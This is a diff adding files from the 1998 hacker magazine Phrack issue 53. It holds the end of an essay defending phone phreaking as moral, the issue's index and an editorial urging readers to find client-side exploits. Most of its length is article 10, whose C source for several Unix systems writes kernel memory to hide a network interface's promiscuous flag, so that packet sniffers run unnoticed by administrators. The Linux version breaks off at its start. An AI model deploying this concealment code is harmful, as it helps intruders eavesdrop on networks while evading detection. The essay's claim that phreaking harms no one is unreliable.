+        phreakers.  A phreaker's interactions with switches does not 
+        cause any disruptions in service or prevent consumers from using 
+        the same switches simultaneously.  Further, there is no 
+        interaction that takes place with consumers as a result of a 
+        phreaker's activities, and so they are never impacted in any 
+        manner.
+
+             It is possible there can be a negative impact as a result of 
+        the perception of phreakers and based on people with different 
+        moral viewpoints than the utilitarian view.  Some people are 
+        scared by a phreaker's knowledge, and some people are intent on 
+        protecting their resources even from those with moral pursuits.  
+        These people may become agitated as a result of a phreaker's 
+        activities, and although they have no utilitarian reason to be, 
+        their agitation should still be considered.  However, weighing 
+        the moral righteousness of the knowledge being gained, an 
+        agitation seems to be greatly outweighed.  Based on these 
+        criteria, it is clear from the utilitarian viewpoint phreaking is 
+        overall beneficial and is morally right.
+
+             In contrast to the views of Mill, Immanuel Kant would not 
+        find phreaking to be a moral act.  In order to find an act moral 
+        from a Kantian perspective, it must be in accord with duty (Kant, 
+        9), universalized (Kant, 14), and then tested for a contradiction 
+        in thought (Kant, 32) or a contradiction in will (Kant, 32).  If 
+        an action does not succeed in passing these tests, it can not be 
+        a moral act.
+
+             The goal of phreaking, the pursuit of knowledge, is in 
+        accordance with duty.  An individual has an inclination towards 
+        improving himself, gaining knowledge being one way of doing so, 
+        so this would be an imperfect duty to self (Kant, 31).  
+
+             There are several possible manners in which the act of 
+        phreaking could be universalized.  One could say "all people 
+        should use the phone system without paying in order to pursue 
+        knowledge."  This is not a contradiction in thought, a phone 
+        system that allowed anyone pursuing knowledge to use it free of 
+        charge could exist and persist.  However, there would be two 
+        major results of having this sort of system.  First, the loss in 
+        revenue from large numbers of people no longer paying would 
+        result in those communicating when not pursuing knowledge 
+        subsidizing those that were.  Second, a free phone system would 
+        have an enormous increase in usage, causing it to reach its 
+        capacity quickly and preventing it from being available to those 
+        who needed to use it.  Nobody wants to have to spend hours 
+        attempting to make a phone call in order to get through, and so a 
+        system of this type is a contradiction in will for most people, 
+        and would thus not be moral.
+
+             A preferred universalization of phreaking would be "all 
+        people interested in gaining knowledge should be able to freely 
+        use unutilized corporate resources in order to do so."  The goal 
+        of a corporation is to maximize profits.  If a corporation has 
+        under utilized resources with a value, it is in the company's 
+        interest to produce additional revenue based on those resources.  
+        If a company does not have under utilized resources, it does not 
+        apply to this universalization.  The final case is if a company 
+        has under utilized resources, but the resources have no value.  
+        If they have no value, of what use would the resource be to a 
+        person interested in gaining knowledge (i.e. if it was useful to 
+        someone, it would have value).  So it is a contradiction of 
+        thought for a company to have an under utilized resource of value 
+        for an extended period of time; if those seeking knowledge are 
+        able to recognize an under utilized resource with value, then the 
+        company would quickly realize that resource does have value, and 
+        utilize its value for profit or else sell the resource off.  
+
+             Because there is no manner in which phreaking can be 
+        universalized so as to preserve its intent and not provide a 
+        contradiction of thought or will, it can not be a moral act in 
+        accordance with the views of Kant.
+
+             In analyzing which of Mill or Kant has a more solid 
+        argument, it becomes clear that neither philosophy is ideal for 
+        all situations.  Both the utilitarian and Kantian viewpoints have 
+        disadvantages that are addressed below, however as a whole the 
+        Mill utilitarian view of phreaking provides a more rational view 
+        that is applicable to those who are phreakers.
+
+             First, the utilitarian viewpoints of Mill only considers the 
+        individual act in the context of the current state of the world 
+        in deciding if it is moral  That is, a single act may in all 
+        cases contribute to the general happiness of the world, but it 
+        may also leave the world changed in some other respect that does 
+        not add to or take away from the general happiness.  However, the 
+        change that has taken place may very will have an impact on how 
+        that same act or a completely unrelated act would impact the 
+        world so as to make what was once moral now immoral.  Although 
+        the potential for alternative moral acts remain in that world, 
+        and so you have not reduced its potential for happiness, what it 
+        has done is impacted the available choices of others in how they 
+        can go about acting in a moral manner.  This is not a concern of 
+        Mill, but of those interested in freedom, as an end to itself, 
+        actions promoting the general happiness may adversely affect the 
+        freedom of others to act in a moral manner.
+
+             The view Kant gives of morality provides that if an act can 
+        not be universally applied, it can not be morally right.  In the 
+        case of phreaking, is it possible that it is at some point for 
+        some people a morally right act to phreak, but not for all people 
+        at all times?  The basis for this argument is that there are some 
+        people who are both honestly extremely interested in the phone 
+        systems and do not have the resources to explore their interest 
+        in any reasonable fashion for some period of time.  The typical 
+        case is with a phreaker is a young adolescent that has become 
+        intrigued with phones.  I would contend that for one that is 
+        truly interested in learning and has no alternative means, that 
+        it is morally right for that person to phreak.  
+
+             However, as that person grows older and gains access to 
+        resources, alternative means become available for him to continue 
+        to learn about the phone systems (money buys resources, a job at 
+        the phone company provides an immense opportunity to learn).  At 
+        the point where alternative means are available, it is no longer 
+        moral for that person to phreak.  Where exactly that point occurs 
+        is a blurred line, but it is certainly not a universal law as 
+        Kant would imply.
+
+             In summary, the subject of phreaking is certainly a 
+        controversial subject and would be viewed by many as an out of 
+        hand immoral activity.  But, at closer examination it is actually 
+        something that is done for very moral reasons and although the 
+        morality of a phreaker may not necessarily correspond to the 
+        morality of all others in society, it is certainly in the mind of 
+        the true phreaker a moral activity in which they are engaging, 
+        with intelligent rational premises backing up their moral views.  
+        Although Kant may not agree with the moral views that are held by 
+        the phreaker, the individual circumstances confronted by the 
+        individual are not considered and if morality can be decided on 
+        an individual basis, as Mill allows, then it may just be that the 
+        Kantian view may be too restricting to account for contemporary 
+        issues faced in today's technological society.
+
+
+----[  EOF
+
diff --git a/phrack53/1.txt b/phrack53/1.txt
new file mode 100644
index 0000000..68e6657
--- /dev/null
+++ b/phrack53/1.txt
@@ -0,0 +1,214 @@
+---[  Phrack Magazine   Volume 8, Issue 53 July 8, 1998, article 01 of 15
+
+
+-------------------------[  P H R A C K     5 3     I N D E X
+
+
+--------[  Rumble in the Mumble
+
+
+    More than 6 months have passed since our last offering.  My most humble,
+sincere and heartfelt apologies.  At long last, here we are.  Better late then
+never, that's what I always say.  Unless of course, the late version sucks,
+then I just like to disavow it entirely.  Well, here we go again.  Another
+Phrack issue to glorify behavior which would otherwise be classified as
+sociopathic or frankly psychotic (according to Mich Kabay).  More of what you
+want, more of what you need.  Technical articles on fanatically enticing
+topics, lines and lines of glorious source, another gut-busting installment of
+Loopback, and of course, the News.  Mammas, don't let your babies grow up to
+be hackers.  Or hookers for that matter.
+
+    Alright.  Let's get down to business.  Let's talk remote attack paradigms.
+Remote attack paradigms can fall into one of two types, based off of the
+standard client/server communication paradigm (we are glossing over any
+extensions to the model like client to client or server to server stuff).  The
+two attack types are client to server (server-centric) and server to client
+(client-centric).  Server-centric attacks are well known, understand and
+documented.  Client-centric attacks are an area that is often overlooked, but
+is definitely fertile ground for exploitation.  Below we look at both.
+
+
+----[  Server-Centricity
+
+    Historically, the vast majority of remote attacks have been server-centric.
+Server-centric, in this scope, refers to attacks that target server (or daemon)
+programs.  A common (and frequently reoccurring) example is sendmail.  The
+attack targets a server (the sendmail daemon) and approximates a client (the
+exploit program).  There are several reasons why this has been the trend:
+
+    -   Server programs typically run with elevated privileges.  Server
+        programs usually require certain system resources or access to special
+        files that necessitate privilege elevation (of course we know this
+        doesn't have to be the case; have a look at POSIX 6).  A successful
+        compromise could very well mean access to the target system at that
+        (higher) privilege level.
+
+    -   Discretion is the attacker's whim.  The client/server message paradigm
+        specifies that a server provides a service that a client may request.
+        Servers exist to process clientele requests.  As per this model, the
+        attacker (client) makes a request (attack) to any server offering
+        the service and may do so at any point.
+
+    -   Client codebase is usually simple.  Dumb client, smart server.  The
+        impact of this is two-fold.  The fact that server code tends to be
+        more complex means that it is tougher to audit from a security
+        stand-point.  The fact that client code is typically smaller and less
+        complex means that exploitation code development time is reduced.
+
+    -   Code reuse in exploitation programs.  Client-based exploitation code
+        bases are often quite similar.  Code such as packet generators and
+        buffer overflow eggs are often reused.  This further cuts down on
+        development time and also reduces required sophistication on the part
+        of the exploit writer.
+
+    All of these make server-centric attacks enticing.  The ability to
+selectively choose a program to attack running with elevated privileges and
+quickly write up exploit code for it is a powerful combination.  It is easy to
+see why this paradigm has perpetuated itself so successfully.  However, up
+until recently it seems another potentially lucrative area of exploitation has
+gone all but overlooked.
+
+
+----[  Client-Centricity
+
+    An often neglected area of exploitation is the exact reverse of the above:
+client-centricity.  Client-centric attacks target client programs (duh).  The
+types of programs in this category include: web browsers (which have seen more
+then their share of vulnerabilities) remote access programs, DNS resolvers and
+IRC clients (to name a few).  The benefits of this attack model are as follows:
+
+    -   Automated (non-discretionary) attacks.  We know that, under the
+        previous paradigm, the attacker has complete autonomy over who s/he
+        attacks.  The benefit there is obvious.  However, non-discretionary
+        attacking implies that the attacker doesn't even have to be around
+        when the attack takes place.  The attacker can set up the server
+        containing the exploit and actually go do something useful (tm).
+
+    -   Wide dispersement.  With client-centric attacks you can gain a wider
+        audience.  If a server contains a popular service, people from all over
+        will seek it out.  Popular websites are constantly bombarded with
+        clientele.  Another consideration: server programs often run in
+        filtered environments.  It may not be possible for an attacker to
+        connect to a server.  This is rarely the case in client-centric 
+        attacks.
+
+    -   Client codebase not developed with security in mind.  If you think
+        server code is bad, you should see some client code.  Memory leaks and
+        stack overruns are all too common.
+
+    -   Largely an untapped resource.  There are so many wonderful holes
+        waiting to be discovered.  Judging at how successful people have been
+        in finding and exploiting holes in server code, it goes to figure that
+        the same success can be had in client code.  In fact, if you take into
+        account the fact that the codebase is largely unaudited from a
+        security perspective, the yields should be high.
+
+    For all the above reasons, people wanting to find security holes should
+be definitely be looking at client programs.  Now go break telnet.
+
+
+Enjoy the magazine.  It is by and for the hacking community.  Period.
+
+
+-- Editor in Chief ----------------[  route
+-- Phrack World News --------------[  disorder
+-- Phrack Publicity ---------------[  dangergirl
+-- Phrack Librarian ---------------[  loadammo
+-- Soother of Typographical Chaos -[  snocrash
+-- Hi!  I'm an idiot! -------------[  Carolyn P. Meinel
+-- The Justice-less Files ---------[  Kevin D. Mitnick (www.kevinmitnick.com)
+-------- Elite -------------------->  Solar Designer
+-- More money than God ------------[  The former SNI
+-- Tom P. and Tim  N. -------------[  Cool as ice, hot as lava.
+-- Official Phrack Song -----------[  KMFDM/Megalomaniac
+-- Official Phrack Tattoo artist --[  C. Nalla Smith
+-- Shout Outs and Thank Yous ------[  haskell, mudge, loadammo, nihilis, daveg,
+-----------------------------------|  halflife, snocrash, apk, solar designer,
+-----------------------------------|  kore, alhambra, nihil, sluggo, Datastorm,
+-----------------------------------|  aleph1, drwho, silitek
+
+
+Phrack Magazine V. 8, #53, xx xx, 1998.  ISSN 1068-1035
+Contents Copyright (c) 1998 Phrack Magazine. All Rights Reserved.  Nothing
+may be reproduced in whole or in part without written permission from the
+editor in chief.  Phrack Magazine is made available quarterly to the public,
+free of charge.  Go nuts people.
+
+Contact Phrack Magazine
+-----------------------
+Submissions:        phrackedit@phrack.com
+Commentary:         loopback@phrack.com
+Editor in Chief:    route@phrack.com
+Publicist:          dangergrl@phrack.com
+Phrack World News:  disorder@phrack.com
+Submissions to the above email address may be encrypted with the following key:
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.6.2
+
+mQENAzMgU6YAAAEH/1/Kc1KrcUIyL5RBEVeD82JM9skWn60HBzy25FvR6QRYF8uW
+ibPDuf3ecgGezQHM0/bDuQfxeOXDihqXQNZzXf02RuS/Au0yiILKqGGfqxxP88/O
+vgEDrxu4vKpHBMYTE/Gh6u8QtcqfPYkrfFzJADzPEnPI7zw7ACAnXM5F+8+elt2j
+0njg68iA8ms7W5f0AOcRXEXfCznxVTk470JAIsx76+2aPs9mpIFOB2f8u7xPKg+W
+DDJ2wTS1vXzPsmsGJt1UypmitKBQYvJrrsLtTQ9FRavflvCpCWKiwCGIngIKt3yG
+/v/uQb3qagZ3kiYr3nUJ+ULklSwej+lrReIdqYEABRG0GjxwaHJhY2tlZGl0QGlu
+Zm9uZXh1cy5jb20+tA9QaHJhY2sgTWFnYXppbmU=
+=1iyt
+-----END PGP PUBLIC KEY BLOCK-----
+
+As always, ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED.  Phrack goes out
+plaintext.  You certainly can subscribe in plaintext.
+
+phrack:~# head -20 /usr/include/std-disclaimer.h
+/*
+ *  All information in Phrack Magazine is, to the best of the ability of the
+ *  editors and contributors, truthful and accurate.  When possible, all facts
+ *  are checked, all code is compiled.  However, we are not omniscient (hell,
+ *  we don't even get paid).  It is entirely possible something contained
+ *  within this publication is incorrect in some way.  If this is the case,
+ *  please drop us some email so that we can correct it in a future issue.
+ *
+ *
+ *  Also, keep in mind that Phrack Magazine accepts no responsibility for the
+ *  entirely stupid (or illegal) things people may do with the information
+ *  contained here-in.  Phrack is a compendium of knowledge, wisdom, wit, and
+ *  sass.  We neither advocate, condone nor participate in any sort of illicit
+ *  behavior.  But we will sit back and watch.
+ *
+ *
+ *  Lastly, it bears mentioning that the opinions that may be expressed in the
+ *  articles of Phrack Magazine are intellectual property of their authors.
+ *  These opinions do not necessarily represent those of the Phrack Staff.
+ */
+
+-------------------------[  T A B L E   O F   C O N T E N T S
+
+ 1 Introduction                                            Phrack Staff   11K
+ 2 Phrack Loopback                                         Phrack Staff   33K
+ 3 Line Noise                                              various        51K
+ 4 Phrack Prophile on Glyph                                Phrack Staff   18K
+ 5 An Overview of Internet Routing                         krnl           50K
+ 6 T/TCP Vulnerabilities                                   route          17K
+ 7 A Stealthy Windows Keylogger                            markj8         25K
+ 8 Linux Trusted Path Execution redux                      K. Baranowski  23K
+ 9 Hacking in Forth                                        mudge          15K
+10 Interface Promiscuity Obscurity                         apk            24K
+11 Watcher, NIDS for the masses                            hacklab        32K
+12 The Crumbling Tunnel                                    Aleph1         52K
+13 Port Scan Detection Tools                               Solar Designer 25K
+14 Phrack World News                                       Disorder       95K
+15 extract.c                                               Phrack Staff   11K
+
+                                                                         482K
+
+-----------------------------------------------------------------------------
+
+    " The advent of information availability and a rise in the number people
+    for whom the net has always been 'the norm' is producing a class of users
+    who cannot think for themselves.  As reliance upon scripted attacks
+    increases, the number of people who personally possess technical knowledge
+    decreases. "
+
+-----------------------------------------------------------------------------
+
+----[  EOF
diff --git a/phrack53/10.txt b/phrack53/10.txt
new file mode 100644
index 0000000..12ce11f
--- /dev/null
+++ b/phrack53/10.txt
@@ -0,0 +1,994 @@
+---[  Phrack Magazine   Volume 8, Issue 53 July 8, 1998, article 10 of 15
+
+
+-------------------------[  Interface Promiscuity Obscurity
+
+
+--------[  apk <apk@itl.waw.pl>
+
+
+
+----[  INTRODUCTION
+
+Normally, when you put an interface into promiscuous mode, it sets a flag
+in the device interface structure telling the world (or anyone who wants
+to check) that the device, is indeed, in promiscuous mode.  This is, of
+course, annoying to those of you who want to obscure this fact from prying
+administrative eyes.  Behold intrepid hacker, your salvation is at hand.
+The following modules for FreeBSD, Linux, HP-UX, IRIX and Solaris allow you
+to obscure the IFF_PROMISC bit and run all your wonderful little packet
+sniffers incognito...
+
+
+----[  IMPLEMENTATION DETAILS
+
+Usage of the code is simple.  After you put the interface into promiscuous
+mode, you can clean the IFF_PROMISC flag with:
+
+    `./i <interface> 0`
+
+and reset the flag with:
+
+    `./i <interface> 1`.
+
+Note that these programs only change interface's flag value, they don't affect
+NIC status.  On systems which allow setting promiscuous mode by SIOCSIFFLAGS
+however, any call to SIOCSIFFLAGS will make the change take effect (e.g. after
+clearing promisc flag:
+
+    'ifconfig <interface> up'
+
+will really turn off promiscuous mode).  Systems for which above is true are:
+FreeBSD, Linux, Irix.  On these three you can run a sniffer in non-promiscuous
+mode, and then some time later set IFF_PROIMISC on the interface, then with
+the above command set promiscuous mode for interface.  This is most useful on
+FreeBSD because in doing this you won't get that annoying `promiscuous mode
+enabled for <interface>' message in the dmesg buffer (it's only logged when
+you enable promiscuous mode via bpf by BIOCPROMISC).
+
+On Solaris, every alias has its own flags, so you can set flags for any alias:
+
+    'interface[:<alias number>]'
+
+(because Solaris doesn't set IFF_PROMISC when you turn on promiscuous mode
+using DLPI you don't need this program however).
+
+
+----[  THE CODE
+
+<++> EX/promisc/freebsd-p.c
+/*
+ *  promiscuous flag changer v0.1, apk
+ *  FreeBSD version, compile with -lkvm
+ *
+ *  usage: promisc [interface 0|1]
+ *
+ *  note:  look at README for notes
+ */
+
+#ifdef __FreeBSD__
+# include <osreldate.h>
+# if __FreeBSD_version >= 300000
+#  define FBSD3
+# endif
+#endif
+
+#include <sys/types.h>
+#include <sys/time.h>
+
+#include <sys/socket.h>
+#include <net/if.h>
+#ifdef FBSD3
+# include <net/if_var.h>
+#endif
+
+#include <kvm.h>
+#include <nlist.h>
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <errno.h>
+#include <string.h>
+#include <fcntl.h>
+#include <unistd.h>
+
+#define IFFBITS \
+"\1UP\2BROADCAST\3DEBUG\4LOOPBACK\5POINTOPOINT\6NOTRAILERS\7RUNNING" \
+"\10NOARP\11PROMISC\12ALLMULTI\13OACTIVE\14SIMPLEX\15LINK0\16LINK1\17LINK2" \
+"\20MULTICAST"
+
+struct nlist nl[] = {
+	{ "_ifnet" },
+#define N_IFNET 0
+	{ "" }
+};
+
+int kread(kvm_t *kd, u_long addr, void *buf, int len) {
+  int c;
+
+  if ((c = kvm_read(kd, addr, buf, len)) != len) 
+    return -1;
+  return c;
+}
+
+int kwrite(kvm_t *kd, u_long addr, void *buf, int len) {
+  int c;
+
+  if ((c = kvm_write(kd, addr, buf, len)) != len) 
+    return -1;
+  return c;
+}
+
+void usage(char *s) {
+  printf("usage: %s [interface 0|1]\n", s);
+  exit(1);
+}
+
+int main(int argc, char *argv[]) {
+#ifdef FBSD3
+  struct ifnethead ifh;
+#endif
+  struct ifnet ifn, *ifp;
+  char ifname[IFNAMSIZ];
+  int unit, promisc, i, any;
+  char *interface, *cp;
+  kvm_t *kd;
+
+  switch (argc) {
+    case 1:
+	promisc = -1;
+	interface = NULL;
+	break;
+    case 3:
+    	interface = argv[1];
+    	if ((cp = strpbrk(interface, "1234567890")) == NULL) {
+      	  printf("bad interface name: %s\n", interface);
+          exit(1);
+        }
+        unit = strtol(cp, NULL, 10);
+        *cp = 0;
+	promisc = atoi(argv[2]);
+	break;
+    default:
+	usage(argv[0]);
+  }
+
+  if ((kd = kvm_open(NULL, NULL, NULL, O_RDWR, argv[0])) == NULL) 
+    exit(1);
+
+  if (kvm_nlist(kd, nl) == -1) {
+    perror("kvm_nlist");
+    exit(1);
+  }
+
+  if (nl[N_IFNET].n_type == 0) {
+    printf("Cannot find symbol: %s\n", nl[N_IFNET].n_name);
+    exit(1);
+  }
+
+#ifdef FBSD3
+  if (kread(kd, nl[N_IFNET].n_value, &ifh, sizeof(ifh)) == -1) {
+    perror("kread");
+    exit(1);
+  }
+  ifp = ifh.tqh_first;
+#else
+  if (kread(kd, nl[N_IFNET].n_value, &ifp, sizeof(ifp)) == -1) {
+    perror("kread");
+    exit(1);
+  }
+  if (kread(kd, (u_long)ifp, &ifp, sizeof(ifp)) == -1) {
+    perror("kread");
+    exit(1);
+  }
+#endif
+
+#ifdef FBSD3
+  for (; ifp; ifp = ifn.if_link.tqe_next) {
+#else
+  for (; ifp; ifp = ifn.if_next) {
+#endif
+    if (kread(kd, (u_long)ifp, &ifn, sizeof(ifn)) == -1) {
+      perror("kread");
+      break;
+    }
+    if (kread(kd, (u_long)ifn.if_name, ifname, sizeof(ifname)) == -1) {
+      perror("kread");
+      break;
+    }
+    printf("%d: %s%d, flags=0x%x ", ifn.if_index, ifname, ifn.if_unit, 
+	   (unsigned short)ifn.if_flags);
+    /* this is from ifconfig sources */
+    cp = IFFBITS;
+    any = 0;
+    putchar('<');
+    while ((i = *cp++) != 0) {
+      if (ifn.if_flags & (1 << (i-1))) {
+	if (any)
+	  putchar(',');
+	any = 1;
+	for (; *cp > 32; )
+	  putchar(*cp++);
+      } else 
+	for (; *cp > 32; cp++)
+	  ;
+    }
+    putchar('>');
+    putchar('\n');
+    if (interface && strcmp(interface, ifname) == 0 && unit == ifn.if_unit) {
+      switch (promisc) {
+	case -1: 
+		break;
+        case 0: if ((ifn.if_flags & IFF_PROMISC) == 0)
+		  printf("\tIFF_PROMISC not set\n");
+                else {
+		  printf("\t%s%d: clearing IFF_PROMISC\n", ifname, unit);
+		  ifn.if_flags &= ~IFF_PROMISC;
+      		  if (kwrite(kd, (u_long)ifp, &ifn, sizeof(ifn)) == -1) 
+                    perror("kwrite");
+                }
+	      break;
+	default: if ((ifn.if_flags & IFF_PROMISC) == IFF_PROMISC)
+		  printf("\tIFF_PROMISC set already\n");
+                else {
+	          printf("\t%s%d: setting IFF_PROMISC\n", ifname, unit);
+		  ifn.if_flags |= IFF_PROMISC;
+      		  if (kwrite(kd, (u_long)ifp, &ifn, sizeof(ifn)) == -1) 
+                    perror("kwrite");
+                }
+                break;
+
+      }
+    }
+  }
+}
+<-->
+<++> EX/promisc/hpux-p.c
+/*
+ *  promiscuous flag changer v0.1, apk
+ *  HP-UX version, on HP-UX 9.x compile with -DHPUX9
+ *
+ *  usage: promisc [interface 0|1]
+ *
+ *  note:  look at README for notes
+ */
+
+/* #define HPUX9 on HP-UX 9.x */
+
+#include <sys/types.h>
+#include <sys/socket.h>
+
+#include <net/if.h>
+
+#include <nlist.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <errno.h>
+#include <string.h>
+#include <fcntl.h>
+#include <unistd.h>
+
+#ifndef HPUX9
+# define PATH_VMUNIX "/stand/vmunix"
+#else
+# define PATH_VMUNIX "/hp-ux"
+#endif
+
+#define PATH_KMEM "/dev/kmem"
+#define IFFBITS \
+"\1UP\2BROADCAST\3DEBUG\4LOOPBACK\5POINTOPOINT\6NOTRAILERS\7RUNNING" \
+"\10NOARP\11PROMISC\12ALLMULTI\13LOCALSUBNETS\14MULTICAST\15CKO\16xNOACC"
+
+struct nlist nl[] = {
+	{ "ifnet" },
+#define N_IFNET 0
+	{ "" }
+};
+
+int kread(fd, addr, buf, len) 
+int fd, len;
+off_t addr;
+void *buf;
+{
+  int c;
+
+  if (lseek(fd, addr, SEEK_SET) == -1) 
+    return -1;
+  if ((c = read(fd, buf, len)) != len) 
+    return -1;
+  return c;
+}
+
+int kwrite(fd, addr, buf, len) 
+int fd, len;
+off_t addr;
+void *buf;
+{
+  int c;
+
+  if (lseek(fd, addr, SEEK_SET) == -1) 
+    return -1;
+  if ((c = write(fd, buf, len)) != len) 
+    return -1;
+  return c;
+}
+
+void usage(s) 
+char *s;
+{
+  printf("usage: %s [interface 0|1]\n", s);
+  exit(1);
+}
+
+main(argc, argv) 
+int argc;
+char **argv;
+{
+  struct ifnet ifn, *ifp;
+  char ifname[IFNAMSIZ];
+  int fd, unit, promisc, i, any;
+  char *interface, *cp;
+
+  switch (argc) {
+    case 1:
+	promisc = -1;
+	interface = NULL;
+	break;
+    case 3:
+    	interface = argv[1];
+    	if ((cp = strpbrk(interface, "1234567890")) == NULL) {
+      	  printf("bad interface name: %s\n", interface);
+          exit(1);
+        }
+        unit = strtol(cp, NULL, 10);
+        *cp = 0;
+	promisc = atoi(argv[2]);
+	break;
+    default:
+	usage(argv[0]);
+  }
+
+  if (nlist(PATH_VMUNIX, nl) == -1) {
+    perror(PATH_VMUNIX);
+    exit(1);
+  }
+  if (nl[N_IFNET].n_type == 0) {
+    printf("Cannot find symbol: %s\n", nl[0].n_name);
+    exit(1);
+  }
+
+  if ((fd = open(PATH_KMEM, O_RDWR)) == -1) {
+    perror(PATH_KMEM);
+    exit(1);
+  }
+  if (kread(fd, nl[N_IFNET].n_value, &ifp, sizeof(ifp)) == -1) {
+    perror("kread");
+    exit(1);
+  }
+
+  for (; ifp; ifp = ifn.if_next) {
+    if (kread(fd, (u_long)ifp, &ifn, sizeof(ifn)) == -1) {
+      perror("kread");
+      break;
+    }
+    if (kread(fd, (u_long)ifn.if_name, ifname, sizeof(ifname)) == -1) {
+      perror("kread");
+      break;
+    }
+    printf("%d: %s%d, flags=0x%x ", ifn.if_index, ifname, ifn.if_unit, 
+	   ifn.if_flags);
+    cp = IFFBITS;
+    any = 0;
+    putchar('<');
+    while ((i = *cp++) != 0) {
+      if (ifn.if_flags & (1 << (i-1))) {
+	if (any)
+	  putchar(',');
+	any = 1;
+	for (; *cp > 32; )
+	  putchar(*cp++);
+      } else 
+	for (; *cp > 32; cp++)
+	  ;
+    }
+    putchar('>');
+    putchar('\n');
+    if (interface && strcmp(interface, ifname) == 0 && unit == ifn.if_unit) {
+      switch (promisc) {
+	case -1: 
+		break;
+        case 0: if ((ifn.if_flags & IFF_PROMISC) == 0)
+		  printf("\tIFF_PROMISC not set\n");
+                else {
+		  printf("\t%s%d: clearing IFF_PROMISC\n", ifname, unit);
+		  ifn.if_flags &= ~IFF_PROMISC;
+      		  if (kwrite(fd, (u_long)ifp, &ifn, sizeof(ifn)) == -1) 
+                    break;
+                }
+	      break;
+	default: if ((ifn.if_flags & IFF_PROMISC) == IFF_PROMISC)
+		  printf("\tIFF_PROMISC set already\n");
+                else {
+	          printf("\t%s%d: setting IFF_PROMISC\n", ifname, unit);
+		  ifn.if_flags |= IFF_PROMISC;
+      		  if (kwrite(fd, (u_long)ifp, &ifn, sizeof(ifn)) == -1) 
+                    break;
+                }
+
+      }
+    }
+  }
+}
+<-->
+<++> EX/promisc/irix-p.c
+/*
+ *  promiscuous flag changer v0.1, apk
+ *  Irix version, on Irix 6.x compile with -lelf, on 5.x with -lmld
+ *
+ *  usage: promisc [interface 0|1]
+ *
+ *  note: look at README for notes on irix64 compile with -DI64 -64
+ */
+
+/* #define I64 for Irix64*/
+
+#include <sys/types.h>
+#include <sys/socket.h>
+
+#include <net/if.h>
+
+#include <nlist.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <errno.h>
+#include <string.h>
+#include <fcntl.h>
+#include <unistd.h>
+
+#define PATH_VMUNIX "/unix"
+
+#define PATH_KMEM "/dev/kmem"
+#define IFFBITS \
+"\1UP\2BROADCAST\3DEBUG\4LOOPBACK\5POINTOPOINT\6NOTRAILERS\7RUNNING" \
+"\10NOARP\11PROMISC\12ALLMULTI\13LOCALSUBNETS\14MULTICAST\15CKO\16xNOACC"
+
+#ifdef I64
+struct nlist64 nl[] = {
+#else
+struct nlist nl[] = {
+#endif
+	{ "ifnet" },
+#define N_IFNET 0
+	{ "" }
+};
+
+int kread(int fd, off_t addr, void *buf, int len) {
+  int c;
+
+#ifdef I64
+  if (lseek64(fd, (off_t)addr, SEEK_SET) == -1) 
+#else
+  if (lseek(fd, (off_t)addr, SEEK_SET) == -1) 
+#endif
+    return -1;
+  if ((c = read(fd, buf, len)) != len) 
+    return -1;
+  return c;
+}
+
+int kwrite(int fd, off_t addr, void *buf, int len) {
+  int c;
+
+#ifdef I64
+  if (lseek64(fd, (off_t)addr, SEEK_SET) == -1) 
+#else
+  if (lseek(fd, (off_t)addr, SEEK_SET) == -1) 
+#endif
+    return -1;
+  if ((c = write(fd, buf, len)) != len) 
+    return -1;
+  return c;
+}
+
+void usage(s) 
+char *s;
+{
+  printf("usage: %s [interface 0|1]\n", s);
+  exit(1);
+}
+
+main(argc, argv) 
+int argc;
+char **argv;
+{
+  struct ifnet ifn, *ifp;
+  char ifname[IFNAMSIZ];
+  int fd, unit, promisc, i, any;
+  char *interface, *cp;
+
+  switch (argc) {
+    case 1:
+	promisc = -1;
+	interface = NULL;
+	break;
+    case 3:
+    	interface = argv[1];
+    	if ((cp = strpbrk(interface, "1234567890")) == NULL) {
+      	  printf("bad interface name: %s\n", interface);
+          exit(1);
+        }
+        unit = strtol(cp, NULL, 10);
+        *cp = 0;
+	promisc = atoi(argv[2]);
+	break;
+    default:
+	usage(argv[0]);
+  }
+
+#ifdef I64
+  if (nlist64(PATH_VMUNIX, nl) == -1) {
+#else
+  if (nlist(PATH_VMUNIX, nl) == -1) {
+#endif
+    perror(PATH_VMUNIX);
+    exit(1);
+  }
+  if (nl[N_IFNET].n_type == 0) {
+    printf("Cannot find symbol: %s\n", nl[0].n_name);
+    exit(1);
+  }
+
+  if ((fd = open(PATH_KMEM, O_RDWR)) == -1) {
+    perror(PATH_KMEM);
+    exit(1);
+  }
+  if (kread(fd, nl[N_IFNET].n_value, &ifp, sizeof(ifp)) == -1) {
+    perror("kread");
+    exit(1);
+  }
+
+  for (; ifp; ifp = ifn.if_next) {
+    if (kread(fd, (u_long)ifp, &ifn, sizeof(ifn)) == -1) {
+      perror("kread");
+      break;
+    }
+    if (kread(fd, (u_long)ifn.if_name, ifname, sizeof(ifname)) == -1) {
+      perror("kread");
+      break;
+    }
+    printf("%d: %s%d, flags=0x%x ", ifn.if_index, ifname, ifn.if_unit, 
+	   ifn.if_flags);
+    cp = IFFBITS;
+    any = 0;
+    putchar('<');
+    while ((i = *cp++) != 0) {
+      if (ifn.if_flags & (1 << (i-1))) {
+	if (any)
+	  putchar(',');
+	any = 1;
+	for (; *cp > 32; )
+	  putchar(*cp++);
+      } else 
+	for (; *cp > 32; cp++)
+	  ;
+    }
+    putchar('>');
+    putchar('\n');
+    if (interface && strcmp(interface, ifname) == 0 && unit == ifn.if_unit) {
+      switch (promisc) {
+	case -1: 
+		break;
+        case 0: if ((ifn.if_flags & IFF_PROMISC) == 0)
+		  printf("\tIFF_PROMISC not set\n");
+                else {
+		  printf("\t%s%d: clearing IFF_PROMISC\n", ifname, unit);
+		  ifn.if_flags &= ~IFF_PROMISC;
+      		  if (kwrite(fd, (u_long)ifp, &ifn, sizeof(ifn)) == -1) 
+                    break;
+                }
+	      break;
+	default: if ((ifn.if_flags & IFF_PROMISC) == IFF_PROMISC)
+		  printf("\tIFF_PROMISC set already\n");
+                else {
+	          printf("\t%s%d: setting IFF_PROMISC\n", ifname, unit);
+		  ifn.if_flags |= IFF_PROMISC;
+      		  if (kwrite(fd, (u_long)ifp, &ifn, sizeof(ifn)) == -1) 
+                    break;
+                }
+
+      }
+    }
+  }
+}
+<-->
+<++> EX/promisc/linux-p.c
+/*
+ *  promiscuous flag changer v0.1, apk
+ *  Linux version
+ *
